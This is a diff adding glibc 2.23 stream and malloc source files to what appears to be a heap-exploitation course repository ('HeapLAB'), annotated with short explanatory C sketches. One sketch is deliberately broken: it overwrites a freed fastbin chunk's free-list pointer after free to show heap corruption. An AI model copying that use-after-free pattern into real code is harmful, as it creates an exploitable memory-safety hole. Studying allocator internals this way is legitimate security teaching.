+  if (result != EOF)
+    fp->_flags &= ~_IO_EOF_SEEN;
+
+  return result;
+}
+libc_hidden_def (_IO_sputbackc)
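
_IO_sputbackc above is what the public ungetc() ultimately calls: when the
pushed-back byte matches the one just read it simply rewinds _IO_read_ptr,
otherwise it falls back to _IO_PBACKFAIL. A minimal user-level sketch of that
behaviour (illustrative only, not part of genops.c; the file path is arbitrary):

#include <stdio.h>

int main(void)
{
  FILE *f = fopen("/etc/hostname", "r");   /* any readable file will do */
  if (f == NULL)
    return 1;
  int c = fgetc(f);        /* consume one byte */
  ungetc(c, f);            /* push it back via _IO_sputbackc */
  int again = fgetc(f);    /* the same byte is returned again */
  printf("%c == %c\n", c, again);
  fclose(f);
  return 0;
}
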
+
+int
+_IO_sungetc (_IO_FILE *fp)
+{
+  int result;
+
+  if (fp->_IO_read_ptr > fp->_IO_read_base)
+    {
+      fp->_IO_read_ptr--;
+      result = (unsigned char) *fp->_IO_read_ptr;
+    }
+  else
+    result = _IO_PBACKFAIL (fp, EOF);
+
+  if (result != EOF)
+    fp->_flags &= ~_IO_EOF_SEEN;
+
+  return result;
+}
+
+#if 0 /* Work in progress */
+/* Seems not to be needed.  */
+#if 0
+void
+_IO_set_column (_IO_FILE *fp, int c)
+{
+  if (c == -1)
+    fp->_column = -1;
+  else
+    fp->_column = c - (fp->_IO_write_ptr - fp->_IO_write_base);
+}
+#else
+int
+_IO_set_column (_IO_FILE *fp, int i)
+{
+  fp->_cur_column = i + 1;
+  return 0;
+}
+#endif
+#endif
+
+
+unsigned
+_IO_adjust_column (unsigned start, const char *line, int count)
+{
+  const char *ptr = line + count;
+  while (ptr > line)
+    if (*--ptr == '\n')
+      return line + count - ptr - 1;
+  return start + count;
+}
+libc_hidden_def (_IO_adjust_column)
+
+#if 0
+/* Seems not to be needed. --drepper */
+int
+_IO_get_column (_IO_FILE *fp)
+{
+  if (fp->_cur_column)
+    return _IO_adjust_column (fp->_cur_column - 1,
+			      fp->_IO_write_base,
+			      fp->_IO_write_ptr - fp->_IO_write_base);
+  return -1;
+}
+#endif
+
+
+int
+_IO_flush_all_lockp (int do_lock)
+{
+  int result = 0;
+  struct _IO_FILE *fp;
+  int last_stamp;
+
+#ifdef _IO_MTSAFE_IO
+  __libc_cleanup_region_start (do_lock, flush_cleanup, NULL);
+  if (do_lock)
+    _IO_lock_lock (list_all_lock);
+#endif
+
+  last_stamp = _IO_list_all_stamp;
+  fp = (_IO_FILE *) _IO_list_all;
+  while (fp != NULL)
+    {
+      run_fp = fp;
+      if (do_lock)
+	_IO_flockfile (fp);
+
+      if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
+#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
+	   || (_IO_vtable_offset (fp) == 0
+	       && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
+				    > fp->_wide_data->_IO_write_base))
+#endif
+	   )
+	  && _IO_OVERFLOW (fp, EOF) == EOF)
+	result = EOF;
+
+      if (do_lock)
+	_IO_funlockfile (fp);
+      run_fp = NULL;
+
+      if (last_stamp != _IO_list_all_stamp)
+	{
+	  /* Something was added to the list.  Start all over again.  */
+	  fp = (_IO_FILE *) _IO_list_all;
+	  last_stamp = _IO_list_all_stamp;
+	}
+      else
+	fp = fp->_chain;
+    }
+
+#ifdef _IO_MTSAFE_IO
+  if (do_lock)
+    _IO_lock_unlock (list_all_lock);
+  __libc_cleanup_region_end (0);
+#endif
+
+  return result;
+}
+
+
+int
+_IO_flush_all (void)
+{
+  /* We want locking.  */
+  return _IO_flush_all_lockp (1);
+}
+libc_hidden_def (_IO_flush_all)
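
_IO_flush_all_lockp above is the engine behind fflush(NULL): it walks the
_IO_list_all chain and calls _IO_OVERFLOW on every stream that has pending
output. A short sketch of the user-visible effect (illustrative only):

#include <stdio.h>

int main(void)
{
  /* Force full buffering so the text sits in stdout's FILE buffer.  */
  setvbuf(stdout, NULL, _IOFBF, 4096);
  fputs("buffered, not yet written", stdout);

  /* fflush(NULL) flushes every open output stream by walking
     _IO_list_all, the same loop as _IO_flush_all_lockp above.  */
  fflush(NULL);
  return 0;
}
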
+
+void
+_IO_flush_all_linebuffered (void)
+{
+  struct _IO_FILE *fp;
+  int last_stamp;
+
+#ifdef _IO_MTSAFE_IO
+  _IO_cleanup_region_start_noarg (flush_cleanup);
+  _IO_lock_lock (list_all_lock);
+#endif
+
+  last_stamp = _IO_list_all_stamp;
+  fp = (_IO_FILE *) _IO_list_all;
+  while (fp != NULL)
+    {
+      run_fp = fp;
+      _IO_flockfile (fp);
+
+      if ((fp->_flags & _IO_NO_WRITES) == 0 && fp->_flags & _IO_LINE_BUF)
+	_IO_OVERFLOW (fp, EOF);
+
+      _IO_funlockfile (fp);
+      run_fp = NULL;
+
+      if (last_stamp != _IO_list_all_stamp)
+	{
+	  /* Something was added to the list.  Start all over again.  */
+	  fp = (_IO_FILE *) _IO_list_all;
+	  last_stamp = _IO_list_all_stamp;
+	}
+      else
+	fp = fp->_chain;
+    }
+
+#ifdef _IO_MTSAFE_IO
+  _IO_lock_unlock (list_all_lock);
+  _IO_cleanup_region_end (0);
+#endif
+}
+libc_hidden_def (_IO_flush_all_linebuffered)
+#ifdef _LIBC
+weak_alias (_IO_flush_all_linebuffered, _flushlbf)
+#endif
+
+
+/* The following is a bit tricky.  In general, we want to unbuffer the
+   streams so that all output which follows is seen.  If we are not
+   looking for memory leaks it does not make much sense to free the
+   actual buffer because this will happen anyway once the program
+   terminates.  If we do want to look for memory leaks we have to free
+   the buffers.  Whether something is freed is determined by the
+   functions in the libc_freeres section.  Those are called as part of
+   the atexit routine, just like _IO_cleanup.  The problem is we do
+   not know whether the freeres code is called first or _IO_cleanup.
+   If the former is the case, we set the DEALLOC_BUFFER variable to
+   true and _IO_unbuffer_all will take care of the rest.  If
+   _IO_unbuffer_all is called first we add the streams to a list
+   which the freeres function later can walk through.  */
+static void _IO_unbuffer_all (void);
+
+static bool dealloc_buffers;
+static _IO_FILE *freeres_list;
+
+static void
+_IO_unbuffer_all (void)
+{
+  struct _IO_FILE *fp;
+  for (fp = (_IO_FILE *) _IO_list_all; fp; fp = fp->_chain)
+    {
+      if (! (fp->_flags & _IO_UNBUFFERED)
+	  /* Iff stream is un-orientated, it wasn't used. */
+	  && fp->_mode != 0)
+	{
+#ifdef _IO_MTSAFE_IO
+	  int cnt;
+#define MAXTRIES 2
+	  for (cnt = 0; cnt < MAXTRIES; ++cnt)
+	    if (fp->_lock == NULL || _IO_lock_trylock (*fp->_lock) == 0)
+	      break;
+	    else
+	      /* Give the other thread time to finish up its use of the
+		 stream.  */
+	      __sched_yield ();
+#endif
+
+	  if (! dealloc_buffers && !(fp->_flags & _IO_USER_BUF))
+	    {
+	      fp->_flags |= _IO_USER_BUF;
+
+	      fp->_freeres_list = freeres_list;
+	      freeres_list = fp;
+	      fp->_freeres_buf = fp->_IO_buf_base;
+	    }
+
+	  _IO_SETBUF (fp, NULL, 0);
+
+	  if (fp->_mode > 0)
+	    _IO_wsetb (fp, NULL, NULL, 0);
+
+#ifdef _IO_MTSAFE_IO
+	  if (cnt < MAXTRIES && fp->_lock != NULL)
+	    _IO_lock_unlock (*fp->_lock);
+#endif
+	}
+
+      /* Make sure that never again the wide char functions can be
+	 used.  */
+      fp->_mode = -1;
+    }
+}
+
+
+libc_freeres_fn (buffer_free)
+{
+  dealloc_buffers = true;
+
+  while (freeres_list != NULL)
+    {
+      free (freeres_list->_freeres_buf);
+
+      freeres_list = freeres_list->_freeres_list;
+    }
+}
+
+
+int
+_IO_cleanup (void)
+{
+  /* We do *not* want locking.  Some threads might use streams but
+     that is their problem, we flush them underneath them.  */
+  int result = _IO_flush_all_lockp (0);
+
+  /* We currently don't have a reliable mechanism for making sure that
+     C++ static destructors are executed in the correct order.
+     So it is possible that other static destructors might want to
+     write to cout - and they're supposed to be able to do so.
+
+     The following will make the standard streambufs be unbuffered,
+     which forces any output from late destructors to be written out. */
+  _IO_unbuffer_all ();
+
+  return result;
+}
+
+
+void
+_IO_init_marker (struct _IO_marker *marker, _IO_FILE *fp)
+{
+  marker->_sbuf = fp;
+  if (_IO_in_put_mode (fp))
+    _IO_switch_to_get_mode (fp);
+  if (_IO_in_backup (fp))
+    marker->_pos = fp->_IO_read_ptr - fp->_IO_read_end;
+  else
+    marker->_pos = fp->_IO_read_ptr - fp->_IO_read_base;
+
+  /* Should perhaps sort the chain? */
+  marker->_next = fp->_markers;
+  fp->_markers = marker;
+}
+
+void
+_IO_remove_marker (struct _IO_marker *marker)
+{
+  /* Unlink from sb's chain. */
+  struct _IO_marker **ptr = &marker->_sbuf->_markers;
+  for (; ; ptr = &(*ptr)->_next)
+    {
+      if (*ptr == NULL)
+	break;
+      else if (*ptr == marker)
+	{
+	  *ptr = marker->_next;
+	  return;
+	}
+    }
+#if 0
+    if _sbuf has a backup area that is no longer needed, should we delete
+    it now, or wait until the next underflow?
+#endif
+}
+
+#define BAD_DELTA EOF
+
+int
+_IO_marker_difference (struct _IO_marker *mark1, struct _IO_marker *mark2)
+{
+  return mark1->_pos - mark2->_pos;
+}
+
+/* Return difference between MARK and current position of MARK's stream. */
+int
+_IO_marker_delta (struct _IO_marker *mark)
+{
+  int cur_pos;
+  if (mark->_sbuf == NULL)
+    return BAD_DELTA;
+  if (_IO_in_backup (mark->_sbuf))
+    cur_pos = mark->_sbuf->_IO_read_ptr - mark->_sbuf->_IO_read_end;
+  else
+    cur_pos = mark->_sbuf->_IO_read_ptr - mark->_sbuf->_IO_read_base;
+  return mark->_pos - cur_pos;
+}
+
+int
+_IO_seekmark (_IO_FILE *fp, struct _IO_marker *mark, int delta)
+{
+  if (mark->_sbuf != fp)
+    return EOF;
+  if (mark->_pos >= 0)
+    {
+      if (_IO_in_backup (fp))
+	_IO_switch_to_main_get_area (fp);
+      fp->_IO_read_ptr = fp->_IO_read_base + mark->_pos;
+    }
+  else
+    {
+      if (!_IO_in_backup (fp))
+	_IO_switch_to_backup_area (fp);
+      fp->_IO_read_ptr = fp->_IO_read_end + mark->_pos;
+    }
+  return 0;
+}
+
+void
+_IO_unsave_markers (_IO_FILE *fp)
+{
+  struct _IO_marker *mark = fp->_markers;
+  if (mark)
+    {
+#ifdef TODO
+      streampos offset = seekoff (0, ios::cur, ios::in);
+      if (offset != EOF)
+	{
+	  offset += eGptr () - Gbase ();
+	  for ( ; mark != NULL; mark = mark->_next)
+	    mark->set_streampos (mark->_pos + offset);
+	}
+    else
+      {
+	for ( ; mark != NULL; mark = mark->_next)
+	  mark->set_streampos (EOF);
+      }
+#endif
+      fp->_markers = 0;
+    }
+
+  if (_IO_have_backup (fp))
+    _IO_free_backup_area (fp);
+}
+libc_hidden_def (_IO_unsave_markers)
+
+#if 0
+/* Seems not to be needed. --drepper */
+int
+_IO_nobackup_pbackfail (_IO_FILE *fp, int c)
+{
+  if (fp->_IO_read_ptr > fp->_IO_read_base)
+	fp->_IO_read_ptr--;
+  if (c != EOF && *fp->_IO_read_ptr != c)
+      *fp->_IO_read_ptr = c;
+  return (unsigned char) c;
+}
+#endif
+
+int
+_IO_default_pbackfail (_IO_FILE *fp, int c)
+{
+  if (fp->_IO_read_ptr > fp->_IO_read_base && !_IO_in_backup (fp)
+      && (unsigned char) fp->_IO_read_ptr[-1] == c)
+    --fp->_IO_read_ptr;
+  else
+    {
+      /* Need to handle a filebuf in write mode (switch to read mode). FIXME!*/
+      if (!_IO_in_backup (fp))
+	{
+	  /* We need to keep the invariant that the main get area
+	     logically follows the backup area.  */
+	  if (fp->_IO_read_ptr > fp->_IO_read_base && _IO_have_backup (fp))
+	    {
+	      if (save_for_backup (fp, fp->_IO_read_ptr))
+		return EOF;
+	    }
+	  else if (!_IO_have_backup (fp))
+	    {
+	      /* No backup buffer: allocate one. */
+	      /* Use nshort buffer, if unused? (probably not)  FIXME */
+	      int backup_size = 128;
+	      char *bbuf = (char *) malloc (backup_size);
+	      if (bbuf == NULL)
+		return EOF;
+	      fp->_IO_save_base = bbuf;
+	      fp->_IO_save_end = fp->_IO_save_base + backup_size;
+	      fp->_IO_backup_base = fp->_IO_save_end;
+	    }
+	  fp->_IO_read_base = fp->_IO_read_ptr;
+	  _IO_switch_to_backup_area (fp);
+	}
+      else if (fp->_IO_read_ptr <= fp->_IO_read_base)
+	{
+	  /* Increase size of existing backup buffer. */
+	  _IO_size_t new_size;
+	  _IO_size_t old_size = fp->_IO_read_end - fp->_IO_read_base;
+	  char *new_buf;
+	  new_size = 2 * old_size;
+	  new_buf = (char *) malloc (new_size);
+	  if (new_buf == NULL)
+	    return EOF;
+	  memcpy (new_buf + (new_size - old_size), fp->_IO_read_base,
+		  old_size);
+	  free (fp->_IO_read_base);
+	  _IO_setg (fp, new_buf, new_buf + (new_size - old_size),
+		    new_buf + new_size);
+	  fp->_IO_backup_base = fp->_IO_read_ptr;
+	}
+
+      *--fp->_IO_read_ptr = c;
+    }
+  return (unsigned char) c;
+}
+libc_hidden_def (_IO_default_pbackfail)
+
+_IO_off64_t
+_IO_default_seek (_IO_FILE *fp, _IO_off64_t offset, int dir)
+{
+  return _IO_pos_BAD;
+}
+
+int
+_IO_default_stat (_IO_FILE *fp, void *st)
+{
+  return EOF;
+}
+
+_IO_ssize_t
+_IO_default_read (_IO_FILE *fp, void *data, _IO_ssize_t n)
+{
+  return -1;
+}
+
+_IO_ssize_t
+_IO_default_write (_IO_FILE *fp, const void *data, _IO_ssize_t n)
+{
+  return 0;
+}
+
+int
+_IO_default_showmanyc (_IO_FILE *fp)
+{
+  return -1;
+}
+
+void
+_IO_default_imbue (_IO_FILE *fp, void *locale)
+{
+}
+
+_IO_ITER
+_IO_iter_begin (void)
+{
+  return (_IO_ITER) _IO_list_all;
+}
+libc_hidden_def (_IO_iter_begin)
+
+_IO_ITER
+_IO_iter_end (void)
+{
+  return NULL;
+}
+libc_hidden_def (_IO_iter_end)
+
+_IO_ITER
+_IO_iter_next (_IO_ITER iter)
+{
+  return iter->_chain;
+}
+libc_hidden_def (_IO_iter_next)
+
+_IO_FILE *
+_IO_iter_file (_IO_ITER iter)
+{
+  return iter;
+}
+libc_hidden_def (_IO_iter_file)
+
+void
+_IO_list_lock (void)
+{
+#ifdef _IO_MTSAFE_IO
+  _IO_lock_lock (list_all_lock);
+#endif
+}
+libc_hidden_def (_IO_list_lock)
+
+void
+_IO_list_unlock (void)
+{
+#ifdef _IO_MTSAFE_IO
+  _IO_lock_unlock (list_all_lock);
+#endif
+}
+libc_hidden_def (_IO_list_unlock)
+
+void
+_IO_list_resetlock (void)
+{
+#ifdef _IO_MTSAFE_IO
+  _IO_lock_init (list_all_lock);
+#endif
+}
+libc_hidden_def (_IO_list_resetlock)
+
+
+#ifdef TODO
+#if defined(linux)
+#define IO_CLEANUP ;
+#endif
+
+#ifdef IO_CLEANUP
+  IO_CLEANUP
+#else
+struct __io_defs {
+    __io_defs() { }
+    ~__io_defs() { _IO_cleanup (); }
+};
+__io_defs io_defs__;
+#endif
+
+#endif /* TODO */
+
+#ifdef text_set_element
+text_set_element(__libc_atexit, _IO_cleanup);
+#endif
diff --git a/HeapLAB/.glibc/glibc_2.23/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.23/malloc/malloc.c
new file mode 100644
index 0000000..d20d595
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.23/malloc/malloc.c
@@ -0,0 +1,5249 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2016 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already, by default, be using a C library containing a malloc
+  that is based on some version of this malloc (for example on
+  Linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    cfree(void* p);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including, 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may
+       also fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+    MALLOC_ALIGNMENT           MAX (2 * sizeof(INTERNAL_SIZE_T),
+				    __alignof__ (long double))
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <malloc-machine.h>
+#include <malloc-sysdep.h>
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-internal.h>
+
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
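
As the comment above says, overwriting freed memory tends to destroy the
allocator's own bookkeeping. A deliberately broken sketch of that failure mode
(hypothetical demo; the exact symptom, an abort message or a plain crash,
depends on the glibc version and chunk size):

#include <stdlib.h>
#include <string.h>

int main(void)
{
  char *a = malloc(32);
  free(a);
  /* A freed fastbin chunk stores its fd pointer where user data used to
     be; overwriting it corrupts the free list.  */
  memset(a, 'A', 32);
  /* Later allocations of the same size follow the corrupted pointer and
     typically crash or abort inside malloc.  */
  malloc(32);
  malloc(32);
  return 0;
}
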
+
+#ifdef NDEBUG
+# define assert(expr) ((void) 0)
+#else
+# define assert(expr) \
+  ((expr)								      \
+   ? ((void) 0)								      \
+   : __malloc_assert (#expr, __FILE__, __LINE__, __func__))
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+
+/*
+  INTERNAL_SIZE_T is the word-size used for internal bookkeeping
+  of chunk sizes.
+
+  The default version is the same as size_t.
+
+  While not strictly necessary, it is best to define this as an
+  unsigned type, even if size_t is a signed type. This may avoid some
+  artificial size limitations on some systems.
+
+  On a 64-bit machine, you may be able to reduce malloc overhead by
+  defining INTERNAL_SIZE_T to be a 32 bit `unsigned int' at the
+  expense of not being able to handle more than 2^32 of malloced
+  space. If this limitation is acceptable, you are encouraged to set
+  this unless you are on a platform requiring 16byte alignments. In
+  this case the alignment requirements turn out to negate any
+  potential advantages of decreasing size_t word size.
+
+  Implementors: Beware of the possible combinations of:
+     - INTERNAL_SIZE_T might be signed or unsigned, might be 32 or 64 bits,
+       and might be the same width as int or as long
+     - size_t might have a different width and signedness than INTERNAL_SIZE_T
+     - int and long might be 32 or 64 bits, and might be the same width
+  To deal with this, most comparisons and difference computations
+  among INTERNAL_SIZE_Ts should cast them to unsigned long, being
+  aware of the fact that casting an unsigned int to a wider long does
+  not sign-extend. (This also makes checking for negative numbers
+  awkward.) Some of these casts result in harmless compiler warnings
+  on some systems.
+*/
+
+#ifndef INTERNAL_SIZE_T
+#define INTERNAL_SIZE_T size_t
+#endif
+
+/* The corresponding word size */
+#define SIZE_SZ                (sizeof(INTERNAL_SIZE_T))
+
+
+/*
+  MALLOC_ALIGNMENT is the minimum alignment for malloc'ed chunks.
+  It must be a power of two at least 2 * SIZE_SZ, even on machines
+  for which smaller alignments would suffice. It may be defined as
+  larger than this though. Note however that code and data structures
+  are optimized for the case of 8-byte alignment.
+*/
+
+
+#ifndef MALLOC_ALIGNMENT
+# if !SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_16)
+/* This is the correct definition when there is no past ABI to constrain it.
+
+   Among configurations with a past ABI constraint, it differs from
+   2*SIZE_SZ only on powerpc32.  For the time being, changing this is
+   causing more compatibility problems due to malloc_get_state and
+   malloc_set_state than will returning blocks not adequately aligned for
+   long double objects under -mlong-double-128.  */
+
+#  define MALLOC_ALIGNMENT       (2 *SIZE_SZ < __alignof__ (long double)      \
+                                  ? __alignof__ (long double) : 2 *SIZE_SZ)
+# else
+#  define MALLOC_ALIGNMENT       (2 *SIZE_SZ)
+# endif
+#endif
+
+/* The corresponding bit mask value */
+#define MALLOC_ALIGN_MASK      (MALLOC_ALIGNMENT - 1)
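
On a typical 64-bit build SIZE_SZ is 8, MALLOC_ALIGNMENT is 16 and
MALLOC_ALIGN_MASK is 0xf. A rough sketch of how a request is rounded up to an
aligned chunk size (the real request2size macro lives further down in the full
file; the standalone constants and the helper name here are assumptions for
the 64-bit case):

#include <stdio.h>
#include <stddef.h>

#define SIZE_SZ            (sizeof (size_t))        /* 8 on x86-64 */
#define MALLOC_ALIGNMENT   (2 * SIZE_SZ)            /* 16 */
#define MALLOC_ALIGN_MASK  (MALLOC_ALIGNMENT - 1)   /* 0xf */

/* Roughly: add room for the size field, round up to the alignment,
   and never go below the minimum chunk size.  */
static size_t approx_chunk_size (size_t req)
{
  size_t sz = (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK;
  return sz < 4 * SIZE_SZ ? 4 * SIZE_SZ : sz;
}

int main (void)
{
  for (size_t r = 0; r <= 40; r += 8)
    printf ("request %2zu -> chunk 0x%zx\n", r, approx_chunk_size (r));
  return 0;
}
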
+
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
